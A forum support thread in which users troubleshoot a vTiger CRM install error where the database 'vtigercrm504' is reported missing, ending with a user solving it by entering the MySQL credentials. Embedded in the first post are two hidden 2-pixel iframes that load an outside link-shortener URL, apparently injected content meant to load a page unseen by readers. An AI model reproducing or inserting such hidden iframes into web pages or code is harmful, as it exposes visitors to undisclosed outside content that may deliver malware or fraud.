The Database "vtigercrm504" is not found.

Hi!
I am trying to install vTiger under Slackware Linux current version.
I am installing it from source.
At step "Confirm Settings" I got this error messege:
The Database "vtigercrm504" is not found.Try changing the Database settings.

I don't understand - I checked "Create Database (will drop the database if exists)" so why this error msg.? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

    hi grzegorzk,

    can you please check if the database is getting created once you click next and taken to confirm settings page.

    when you select "create database" you will be asked to give the root username and password. try to give the same input as username and password (that is below hostname as well)

    ok, i have this same error, and cannot get around it! i have checked several things and nothing seems to work for me. i'm using ubuntu 7.10 lamp install. any ideas or help would be greatly appreciated. thanks!

    oh, by the way the database is made, because i can see it in phpmyadmin, however it is an empty database, perhaps it isn't creating it correctly?

    ahh, never mind! i had to put the mysql username and password, not just a username and password. solved!
